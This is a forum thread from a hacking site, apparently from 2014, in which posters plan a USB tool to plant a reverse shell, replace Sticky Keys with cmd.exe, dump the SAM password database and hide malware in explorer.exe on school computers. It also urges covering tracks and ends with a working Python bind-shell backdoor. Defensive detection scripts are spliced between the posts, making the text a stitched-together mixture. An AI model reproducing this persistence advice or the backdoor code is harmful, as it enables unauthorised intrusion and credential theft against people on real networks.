EvilZone

Programming and Scripting => Projects and Discussion => : DeXtreme June 12, 2014, 08:16:23 PM

: Project Shebang
: DeXtreme June 12, 2014, 08:16:23 PM
Heya fellas, I was thinking about writing a script, probably batch, which when run will:

1. Copy a reverse-shell executable (written in Python) to the host and make it run at startup

2. Replace the Sticky Keys application with cmd.exe

3. Dump the SAM database

4. Save a rough directory listing of folders like My Documents etc.

And a whole lot of other stuff I'm yet to think of.


Loaded on a USB stick. I'll have to run it myself of course but is there a way to automate it?
: Re: Project Shebang
: ThePH30N1X June 12, 2014, 09:09:29 PM
Is this what you're looking for? http://www.samlogic.net/articles/autorun-usb-flash-drive.htm
: Re: Project Shebang
: Kulverstukas June 12, 2014, 09:31:55 PM
This is what he's looking for: https://evilzone.org/projects-and-discussion/teensy-dropper-project-details-and-progress/
Autorun is dead, forget about it. HID is the future.

Python reverse shell sounds ridiculous. A regular user won't have Python installed and on Linux it can just be blocked. I'd go for netcat or at least an MSF-generated reverse shell...
: Re: Project Shebang
: DeXtreme June 12, 2014, 09:41:12 PM
This is what he's looking for: https://evilzone.org/projects-and-discussion/teensy-dropper-project-details-and-progress/
Autorun is dead, forget about it. HID is the future.

Python reverse shell sounds ridiculous. A regular user won't have Python installed and on Linux it can just be blocked. I'd go for netcat or at least an MSF-generated reverse shell...

I was gonna compile the script to .exe with py2exe or PyInstaller. Plus I just wanted the feel of writing a reverse shell ;D I've been checking out HID but I'm not sure I can get the hardware. I'll continue reading up on it though.
: Re: Project Shebang
: frog June 13, 2014, 02:42:12 AM
I was gonna compile the script to .exe with py2exe or PyInstaller. Plus I just wanted the feel of writing a reverse shell ;D I've been checking out HID but I'm not sure I can get the hardware. I'll continue reading up on it though.

That will work. You could have the initial batch file save the py2exe-generated directory (which contains the executable, some Python C modules and some .dlls for functionality) to the user's appdata/local (to hide), but you will need admin privileges to write registry keys for the startup process.

You don't need admin privileges to copy to C:\Users\<username>\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup, which will achieve the same result as writing to the key in the registry. It will run when the user logs in. Right now I have a shortcut to the Rainmeter binary lurking in my startup folder.

Next have the batch file generate another .bat that points to your .exe and save it to the startup folder previously mentioned, and that SHOULD work.

Since you will be launching the batch file manually (at least for now), you will be able to start the batch file as admin and you can set things up a lot better. First off, read this article about alternate data streams and you will see the potential for hiding your .exe even further. Imagine having your .exe hidden inside of another one, let's say explorer.exe.

The result will be that every time explorer.exe runs, your binary will also run, inside the original process! This means it doesn't show in Task Manager; only the original explorer.exe shows in the list with slightly more memory usage than normal. I haven't tried this with explorer.exe but I know for a fact it works with other .exe's.

Read the attachment.

Also, here's a link for a cheap HID device.
https://www.pjrc.com/store/teensy31.html

Works with the Arduino IDE, with the Teensyduino plugin available for free on the site in the link.
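From the defender's side, the per-user Startup folder frog names above is one of the first places an incident responder looks for unwanted persistence. The following is an added example, not code from this thread or from any of its posters: it hashes every file in a Startup-style directory and reports entries that are new, changed or missing relative to a baseline of approved files, flagging new entries whose extension means they run as code. The function names, the baseline format and the sample files built in `demo()` are my own assumptions.

```python
"""Audit an autorun (Startup) directory against a known-good baseline."""
import hashlib
import os
import tempfile
from pathlib import Path

# File types the shell executes when it processes the Startup folder.
EXECUTABLE_SUFFIXES = {".bat", ".cmd", ".exe", ".lnk", ".vbs", ".ps1", ".js"}


def sha256_of(path):
    """Stream a file through SHA-256 and return the hex digest."""
    digest = hashlib.sha256()
    with open(path, "rb") as fh:
        for chunk in iter(lambda: fh.read(65536), b""):
            digest.update(chunk)
    return digest.hexdigest()


def default_startup_dir():
    """Per-user Startup folder on Windows (assumes APPDATA is set)."""
    return (Path(os.environ.get("APPDATA", "")) / "Microsoft" / "Windows"
            / "Start Menu" / "Programs" / "Startup")


def audit_startup_dir(startup_dir, baseline):
    """Compare a directory with a baseline {filename: sha256 hex digest}.

    Returns {"new": [...], "changed": [...], "missing": [...],
             "suspicious": [...]}, where "suspicious" lists the new
    entries whose suffix means they run as code (a dropped .bat or .exe).
    """
    startup_dir = Path(startup_dir)
    report = {"new": [], "changed": [], "missing": [], "suspicious": []}
    seen = set()
    for entry in sorted(startup_dir.iterdir()):
        if not entry.is_file():
            continue
        seen.add(entry.name)
        if entry.name not in baseline:
            report["new"].append(entry.name)
            if entry.suffix.lower() in EXECUTABLE_SUFFIXES:
                report["suspicious"].append(entry.name)
        elif baseline[entry.name] != sha256_of(entry):
            report["changed"].append(entry.name)
    report["missing"] = sorted(set(baseline) - seen)
    return report


def demo():
    """Constructed scenario (assumption, not a real host): one approved
    shortcut, one dropped launcher .bat, one baseline entry that has
    disappeared. Returns the audit report."""
    workdir = Path(tempfile.mkdtemp(prefix="startup_audit_"))
    (workdir / "approved.lnk").write_bytes(b"approved shortcut contents")
    # "unknown.exe" is a placeholder name for the sample.
    (workdir / "launcher.bat").write_bytes(b"@echo off\r\nstart unknown.exe\r\n")
    baseline = {
        "approved.lnk": hashlib.sha256(b"approved shortcut contents").hexdigest(),
        "retired.lnk": "0" * 64,  # in the baseline, no longer on disk
    }
    return audit_startup_dir(workdir, baseline)


if __name__ == "__main__":
    for category, names in demo().items():
        print(f"{category:10s} {names}")
```

On a real machine you would call `audit_startup_dir(default_startup_dir(), baseline)` with a baseline captured from a known-clean state; the same check applies to the all-users Startup folder and, with a registry reader, to the Run keys frog mentions.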
: Re: Project Shebang
: DeXtreme June 13, 2014, 04:21:17 AM
Thanks a lot frog. That's pretty useful stuff. Originally I planned on simply copying the files to the directories and editing the registry, but your way sounds interesting. Plus the .exe-in-.exe info looks great. I'll be sure to look into it.

Gonna have to put a hold on the Teensy though. Ordering stuff from here is murder.

But thanks again. I'll keep y'all posted. ;D
: Re: Project Shebang
: Kulverstukas June 13, 2014, 07:17:52 AM
I have a Teensy 2.0, it's kinda cheap and cool. Don't bother with the SD card shield tho, it's useless.
py2exe for a reverse shell sounds like overkill bro. There is plenty of example code to do it in C/C++. Much better that way, and as I said before, there's always Netcat.
: Re: Project Shebang
: frog June 13, 2014, 08:03:38 AM
Thanks a lot frog. That's pretty useful stuff. Originally I planned on simply copying the files to the directories and editing the registry, but your way sounds interesting. Plus the .exe-in-.exe info looks great. I'll be sure to look into it.

Gonna have to put a hold on the Teensy though. Ordering stuff from here is murder.

But thanks again. I'll keep y'all posted. ;D

No problem, just trying to keep the wheels turning. Where are you at in the world? Just curious about your reasoning on ordering things.
: Re: Project Shebang
: DeXtreme June 13, 2014, 07:10:21 PM
I have a Teensy 2.0, it's kinda cheap and cool. Don't bother with the SD card shield tho, it's useless.
py2exe for a reverse shell sounds like overkill bro. There is plenty of example code to do it in C/C++. Much better that way, and as I said before, there's always Netcat.

True. It would be better that way. However, my original plan for the reverse shell was to connect back based on my MAC address, so regardless of my IP the shell can still find me. It's mainly for the WLAN at school. People log on and off so IPs aren't constant.
My C isn't that good either ;D so I thought I'd use Python as a proof of concept. Maybe later code it in C.

What do you think?

No problem, just trying to keep the wheels turning. Where are you at in the world? Just curious about your reasoning on ordering things.

Ghana.. shipping isn't exactly a breeze down here and the rates are sky high.
: Re: Project Shebang
: Kulverstukas June 13, 2014, 09:11:10 PM
I'd like to see how you will identify yourself in the world with just a MAC...
Python as a PoC, yeah that sounds good. Tho I recommend switching to C on a normal basis.
: Re: Project Shebang
: frog June 13, 2014, 11:32:09 PM
I'd like to see how you will identify yourself in the world with just a MAC...
Python as a PoC, yeah that sounds good. Tho I recommend switching to C on a normal basis.

If it's on an intranet (the LAN), no problem. Just use ARP request packets to find the MAC and corresponding IP.

I'm surprised how many people are from a different country than me on this site. I like it.
: Re: Project Shebang
: DeXtreme June 14, 2014, 01:16:07 AM
Yeah, it's on LAN. WLAN to be exact. I read up on ARP requests and it looks like it's only good for looking up the MAC address with the IP. The opposite is RARP, but it seems it's not activated by default. I was planning on sending a SYN packet with my MAC using Scapy and reading the IP from the ACK packet, then connecting via socket with that. The only problem is downloading all the files needed to run Scapy on Windows. The sites seem to be down from here.
: Re: Project Shebang
: frog June 14, 2014, 12:02:38 PM
Yeah, it's on LAN. WLAN to be exact. I read up on ARP requests and it looks like it's only good for looking up the MAC address with the IP. The opposite is RARP, but it seems it's not activated by default. I was planning on sending a SYN packet with my MAC using Scapy and reading the IP from the ACK packet, then connecting via socket with that. The only problem is downloading all the files needed to run Scapy on Windows. The sites seem to be down from here.

There are other packet capture and packet decoding/encoding libraries for Python. Here's a couple. You might have to have a specific version of Python though.

http://corelabs.coresecurity.com/index.php?module=Wiki&action=view&type=tool&name=Pcapy
http://corelabs.coresecurity.com/index.php?module=Wiki&action=view&type=tool&name=Impacket
https://code.google.com/p/dpkt/

Problem is there's not a ton of documentation for these modules.

You could also craft the RARP request from scratch using raw sockets, but I think I found what you are looking for; this library can craft RARP packets:
https://pypi.python.org/pypi/arp/1.0
: Re: Project Shebang
: proxx June 14, 2014, 01:43:28 PM
Yeah, it's on LAN. WLAN to be exact. I read up on ARP requests and it looks like it's only good for looking up the MAC address with the IP. The opposite is RARP, but it seems it's not activated by default. I was planning on sending a SYN packet with my MAC using Scapy and reading the IP from the ACK packet, then connecting via socket with that. The only problem is downloading all the files needed to run Scapy on Windows. The sites seem to be down from here.
You are making this very difficult on yourself, I suggest reading up a bit on TCP/IP
: Re: Project Shebang
: DeXtreme June 15, 2014, 10:57:08 PM
There are other packet capture and packet decoding/encoding libraries for Python. Here's a couple. You might have to have a specific version of Python though.

http://corelabs.coresecurity.com/index.php?module=Wiki&action=view&type=tool&name=Pcapy
http://corelabs.coresecurity.com/index.php?module=Wiki&action=view&type=tool&name=Impacket
https://code.google.com/p/dpkt/

Problem is there's not a ton of documentation for these modules.

You could also craft the RARP request from scratch using raw sockets, but I think I found what you are looking for; this library can craft RARP packets:
https://pypi.python.org/pypi/arp/1.0

Cool. Thanks again frog.



You are making this very difficult on yourself, I suggest reading up a bit on TCP/IP

;D Great advice. Shoulda done this before getting so specific. I am not done reading this TCP/IP book I got, but a quick question:

Instead of using MAC, could I just query the network's DNS server with my computer name?
: Re: Project Shebang
: N3mesis June 15, 2014, 11:23:12 PM
Do you have any plans of concealing your identity? With your current plan it'd be pretty trivial to track you down, and with plans to put your real, static IP AND hostname in the logs you're screwed if anyone gets smart and realizes they were hacked. I suggest putting some thought into anonymity. I won't tell you how, but do some research and be creative ;)


If you want to hack in today's world, covering your tracks is probably the most important thing you can do. Otherwise you probably won't be hacking for very long.
: Re: Project Shebang
: frog June 16, 2014, 08:01:04 AM
Cool. Thanks again frog.



;D Great advice. Shoulda done this before getting so specific. I am not done reading this TCP/IP book I got, but a quick question:

Instead of using MAC, could I just query the network's DNS server with my computer name?

Np dude, I help where I can. You can make requests to local DNS servers for IP addresses, but the server will log this, and if you try spoofing DNS replies, depending on their DNS server daemon they will be warned of it (mail, logs, w/e). I like the idea of using RARP better. Link layer vs. application layer?
: Re: Project Shebang
: proxx June 16, 2014, 08:06:29 AM
Cool. Thanks again frog.



;D Great advice. Shoulda done this before getting so specific. I am not done reading this TCP/IP book I got, but a quick question:

Instead of using MAC, could I just query the network's DNS server with my computer name?
Well, you said that you will be using it on a WLAN mostly, which is not much different from a regular LAN.
Using a fixed IP address is by far the easiest; very often sysadmins tend to specify a DHCP pool from a certain starting point to an endpoint, and any addresses not in that range will never be in use or are used for specific services etc.
But I understand that this isn't fancy enough :P

Since you are on the same LAN and won't have to be bothered with things like NAT and other network horrors, there is also no real reason to use a reverse connection; you can in this case flip the model and use the clients as servers.
Have them open a specific port and fetch the data yourself; this way they don't depend on a server on the network, thus fewer things to go wrong.

Another idea might be to use mere force; in the realm of computing ~250 or tenfolds are nothing.
It might be a little noisy, but why not have the client attempt to connect to the entire range of addresses in the network.
Say the client is on 192.168.100.173 and the server is on .058.
Just let the client attempt a connection to say port 32112 on the entire range from 0-254.
Within milliseconds it will hit the server and a connection is established.

Perhaps things like broadcast or reverse DNS might be interesting protocols to investigate.
Keeping it KISS is the way to go no matter what you do :))
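proxx's "try port 32112 on every address until you hit the server" is, from the network defender's side, a textbook horizontal sweep: one source, one destination port, many distinct destination IPs in a short window, which is exactly why he calls it noisy. The detector below is an added example, not code from the thread: `detect_port_sweeps()` reads simple whitespace-separated connection-log lines (`timestamp src dst dport result`) and reports any (source, port) pair that reaches a threshold of distinct destinations inside a sliding time window. The log format, the thresholds and the sample lines produced by `constructed_sample_log()` are my own constructions, using the thread's 192.168.100.0/24 addresses.

```python
"""Flag one source sweeping one port across many hosts in connection logs."""
from collections import defaultdict
from datetime import datetime, timedelta


def parse_line(line):
    """'2014-06-16T08:10:00 src dst port RESULT' -> (datetime, src, dst, port, result)."""
    ts, src, dst, port, result = line.split()
    return datetime.fromisoformat(ts), src, dst, int(port), result


def detect_port_sweeps(lines, threshold=10, window=timedelta(seconds=5)):
    """Return {(src, dport): peak distinct destinations seen within `window`}
    for every (src, dport) pair whose peak reaches `threshold`."""
    events = defaultdict(list)
    for line in lines:
        if line.strip():
            ts, src, dst, port, _ = parse_line(line)
            events[(src, port)].append((ts, dst))

    alerts = {}
    for key, evs in events.items():
        evs.sort()  # time order, so a sliding window works
        in_window = defaultdict(int)  # dst -> events currently inside the window
        left = 0
        peak = 0
        for ts, dst in evs:
            in_window[dst] += 1
            # Evict events older than `window` relative to the newest one.
            while ts - evs[left][0] > window:
                old_dst = evs[left][1]
                in_window[old_dst] -= 1
                if in_window[old_dst] == 0:
                    del in_window[old_dst]
                left += 1
            peak = max(peak, len(in_window))
        if peak >= threshold:
            alerts[key] = peak
    return alerts


def constructed_sample_log():
    """Constructed log (not real traffic): one client walks .1-.20 and then
    reaches .58 on port 32112 within about two seconds, alongside ordinary
    HTTPS connections from .58 spread over minutes."""
    start = datetime(2014, 6, 16, 8, 10, 0)
    lines = []
    for i in range(1, 21):
        ts = start + timedelta(milliseconds=100 * i)
        lines.append(f"{ts.isoformat()} 192.168.100.173 192.168.100.{i} 32112 REJECT")
    ts = start + timedelta(milliseconds=2100)
    lines.append(f"{ts.isoformat()} 192.168.100.173 192.168.100.58 32112 ACCEPT")
    for i, host in enumerate((10, 11, 12)):
        ts = start + timedelta(minutes=i)
        lines.append(f"{ts.isoformat()} 192.168.100.58 192.168.100.{host} 443 ACCEPT")
    return lines


if __name__ == "__main__":
    for (src, port), n in detect_port_sweeps(constructed_sample_log()).items():
        print(f"sweep: {src} reached {n} distinct hosts on port {port}")
```

The rejected attempts are the signal: a client that has to probe the whole /24 leaves a burst of failed connections to one port on every host that is not the server, which a firewall or flow log records even when the eventual successful connection looks ordinary.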
: Re: Project Shebang
: DeXtreme June 16, 2014, 08:41:47 PM
Well, you said that you will be using it on a WLAN mostly, which is not much different from a regular LAN.
Using a fixed IP address is by far the easiest; very often sysadmins tend to specify a DHCP pool from a certain starting point to an endpoint, and any addresses not in that range will never be in use or are used for specific services etc.
But I understand that this isn't fancy enough :P

Since you are on the same LAN and won't have to be bothered with things like NAT and other network horrors, there is also no real reason to use a reverse connection; you can in this case flip the model and use the clients as servers.
Have them open a specific port and fetch the data yourself; this way they don't depend on a server on the network, thus fewer things to go wrong.

Another idea might be to use mere force; in the realm of computing ~250 or tenfolds are nothing.
It might be a little noisy, but why not have the client attempt to connect to the entire range of addresses in the network.
Say the client is on 192.168.100.173 and the server is on .058.
Just let the client attempt a connection to say port 32112 on the entire range from 0-254.
Within milliseconds it will hit the server and a connection is established.

Perhaps things like broadcast or reverse DNS might be interesting protocols to investigate.
Keeping it KISS is the way to go no matter what you do :))

True. Those could work, but if I remember correctly I tried assigning my own IP address and my laptop just plain refused to connect to the WLAN (what do you think could have caused that?). The networks I plan on using have little or no network monitoring, so I'm taking advantage of that to be a little loose with the anonymity and focus on core functionality. Computer security isn't something taken very seriously here (yay for me ;D). I think I'll write a different script for each method, just for the sake of learning.
: Re: Project Shebang
: proxx June 16, 2014, 09:28:47 PM
True. Those could work, but if I remember correctly I tried assigning my own IP address and my laptop just plain refused to connect to the WLAN (what do you think could have caused that?). The networks I plan on using have little or no network monitoring, so I'm taking advantage of that to be a little loose with the anonymity and focus on core functionality. Computer security isn't something taken very seriously here (yay for me ;D). I think I'll write a different script for each method, just for the sake of learning.
On what OS was that?
The way I know works is by using wpa_supplicant and just assigning a static IP with ifconfig; don't forget to add a route with route add.
I've seen many GUI tools fucking that up.
The clean way to do it would be to see if arping responds on a certain IP address to make sure it is free, so there won't be any conflicts.
Or fire up netdiscover before assigning an address; that way you will have a nice overview of the current pool connected to the AP. This will in turn give you all the MAC addresses on the network as well; it also does lookups for vendors, which allows you to quickly pick out the phones etc.
: Re: Project Shebang
: DeXtreme June 16, 2014, 09:50:42 PM
On what OS was that?
The way I know works is by using wpa_supplicant and just assigning a static IP with ifconfig; don't forget to add a route with route add.
I've seen many GUI tools fucking that up.
The clean way to do it would be to see if arping responds on a certain IP address to make sure it is free, so there won't be any conflicts.
Or fire up netdiscover before assigning an address; that way you will have a nice overview of the current pool connected to the AP. This will in turn give you all the MAC addresses on the network as well; it also does lookups for vendors, which allows you to quickly pick out the phones etc.


Kali Linux. I used the networking GUI. Wasn't conversant with using the CLI then, so you're probably right.



Okay, so I read up and wrote this script. Pretty simple really. I wrote it so that to use it, the first thing you have to send is the KEY. I'll write it in C next.

TODO:
Keep track of current directory

All suggestions are welcome ;D

: (python)
import socket,subprocess

#create socket
s=socket.socket()
s.setsockopt(socket.SOL_SOCKET,socket.SO_REUSEADDR, 1)

#open port 5052 on all interfaces and listen for connections
s.bind(("",5052))
s.listen(5)

while 1:
    #accept connections
    con,addr=s.accept()
    con.settimeout(2000.0)

    #receive the key (Python 2: recv() returns str, so the comparison
    #with "XXX" below works; on Python 3 it returns bytes and never matches)
    key=con.recv(1024)

    while key=="XXX":
        try:
            #receive command
            cmd=con.recv(1024)

            #execute command
            proc = subprocess.Popen(cmd, shell=True, stdout=subprocess.PIPE,\
                            stderr=subprocess.PIPE, stdin=subprocess.PIPE)
            out,err=proc.communicate()

            #send output
            con.send(out+err)
        except:
            con.close()
            key=""
            break
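The script above binds port 5052 on every interface and hands whatever it receives to a shell, so on the host it shows up as an unexpected network-reachable listener owned by an interpreter. The audit below is an added example, not code from the thread: it parses `ss -ltnp` style output (Linux; the sample rows are constructed) and flags listeners that are reachable from the network and absent from an allowlist, raising the severity when the owning process is a script interpreter or a generic network tool. The allowlist, the interpreter list and the sample output are my own assumptions; Windows `netstat -ano` output has a different layout and would need its own parser.

```python
"""Audit LISTEN sockets from `ss -ltnp` output against an allowlist."""
import re

# Matches the LISTEN rows of `ss -ltnp`; the trailing ",fd=N))" is not needed.
SS_LINE = re.compile(
    r'^LISTEN\s+\d+\s+\d+\s+(?P<addr>\S+?):(?P<port>\d+)\s+\S+'
    r'(?:\s+users:\(\("(?P<proc>[^"]+)",pid=(?P<pid>\d+))?'
)

# (address, port, process) triples an administrator has approved. Assumption.
ALLOWED = {("0.0.0.0", 22, "sshd"), ("[::]", 22, "sshd")}
LOOPBACK = ("127.0.0.1", "[::1]", "::1")
# Processes that rarely have a legitimate reason to accept network connections.
INTERPRETERS = {"python", "python2", "python3", "perl", "ruby",
                "nc", "ncat", "socat", "bash", "sh"}

# Constructed sample output, not captured from a real host.
SAMPLE_SS_OUTPUT = """\
State   Recv-Q  Send-Q  Local Address:Port   Peer Address:Port  Process
LISTEN  0       128     0.0.0.0:22           0.0.0.0:*          users:(("sshd",pid=812,fd=3))
LISTEN  0       128     127.0.0.1:631        0.0.0.0:*          users:(("cupsd",pid=700,fd=6))
LISTEN  0       5       0.0.0.0:5052         0.0.0.0:*          users:(("python",pid=4312,fd=3))
LISTEN  0       128     [::]:22              [::]:*             users:(("sshd",pid=812,fd=4))
LISTEN  0       128     *:8080               *:*                users:(("java",pid=999,fd=20))
"""


def parse_ss_output(text):
    """Yield one dict per LISTEN row; the header and unmatched rows are skipped."""
    for line in text.splitlines():
        m = SS_LINE.match(line.strip())
        if m:
            yield {
                "addr": m["addr"],
                "port": int(m["port"]),
                "proc": m["proc"] or "?",
                "pid": int(m["pid"]) if m["pid"] else None,
            }


def audit_listeners(text, allowed=ALLOWED):
    """Return [(severity, addr, port, proc, pid)] for listeners that are
    network-reachable and not on the allowlist."""
    findings = []
    for row in parse_ss_output(text):
        if row["addr"] in LOOPBACK:
            continue  # only reachable from the host itself
        if (row["addr"], row["port"], row["proc"]) in allowed:
            continue
        severity = "high" if row["proc"] in INTERPRETERS else "medium"
        findings.append((severity, row["addr"], row["port"], row["proc"], row["pid"]))
    return findings


if __name__ == "__main__":
    for severity, addr, port, proc, pid in audit_listeners(SAMPLE_SS_OUTPUT):
        print(f"[{severity}] {proc} (pid {pid}) listening on {addr}:{port}")
```

Run against live output with `audit_listeners(subprocess.run(["ss", "-ltnp"], capture_output=True, text=True).stdout)`; the 5052/python row is the one a responder would follow up on by inspecting the process's command line and its parent, and the medium finding for an unlisted service is the prompt to extend the allowlist deliberately rather than ignore it.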